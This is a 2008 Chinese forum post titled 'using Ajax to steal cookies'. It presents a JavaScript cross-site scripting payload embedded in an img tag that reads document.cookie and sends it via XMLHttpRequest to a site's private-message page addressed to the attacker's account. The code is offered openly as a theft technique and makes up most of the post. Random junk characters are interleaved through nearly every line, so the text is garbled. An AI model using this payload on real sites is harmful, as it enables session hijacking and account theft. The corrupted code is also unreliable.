我爱电脑技术论坛 » 网络安全区 » 利用Ajax方式盗取Cookies

LOK 发表于 2008-6-7 22:49

利用Ajax方式盗取Cookies

一个简单的httprequest声明以及提交的过程
"z I `&sXJb[7V
qp)ES)E3d B <img src="javascript: $oQe9YZ.I
//这里先要把XMLHttpRequestObject设置为false来验证声明httprequest时是否为true1w`}8Nt0\
var XMLHTTPRequestObject = false;"]B4uWlNh
if (window.XMLHttpRequest)
#Z;i7_/\!K i7t {
m0`$W*\3Xh XMLHttpRequestObject = new XMLHttpRequest();L:DZUWb'Mt
}:~Z*l:B0E2},OC
else if(window.ActiveXObject)1_1Gr(q/r8K M;K
{8i"W*b#Nom#x
XMLHttpRequestObject = new ActiveXObject("Microsoft.XMLHTTP");G,s5o+~PYR\,Y5vy
}
p8t+j3[^^ else
8hu+o`"E y`p {
]U$xC7~V alert("Javascript must be enabled to continue.");n}HO C6E*h
}k3T ?]M;h0^4J
function socket()
P+]*b
\9Y!P {
YSd&bT OkD //下面这行将非常重要.注意cookies是以参数的形式进行提交的#y|tITl)\(L-a
-A+[FS2\5m(_
XMLHttpRequestObject.open('GET', 'http://www.site.com/privatemessage.php?
!B}qir1FXl#L user=yourusername&subject=' + window.document.cookie, true);%H~8Sp"RJ5r/~
XMLHttpRequestObject.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");7m,lY#f}!y8|~$S
XMLHttpRequestObject.send(null);
r[B @5Gc9V //这句执行完，我们就可以放下心来了。
T1jwl0irn delete XMLHttpRequestObject;
C*\sshU@X&n)W2~ }
"TW9m/jjm //不要忘记这是一张图片，所以我们必须关闭标签V1W$q|$t8?5Yvg6d;V+CS
window.document.onload='socket();'">

查看完整版本: 利用Ajax方式盗取Cookies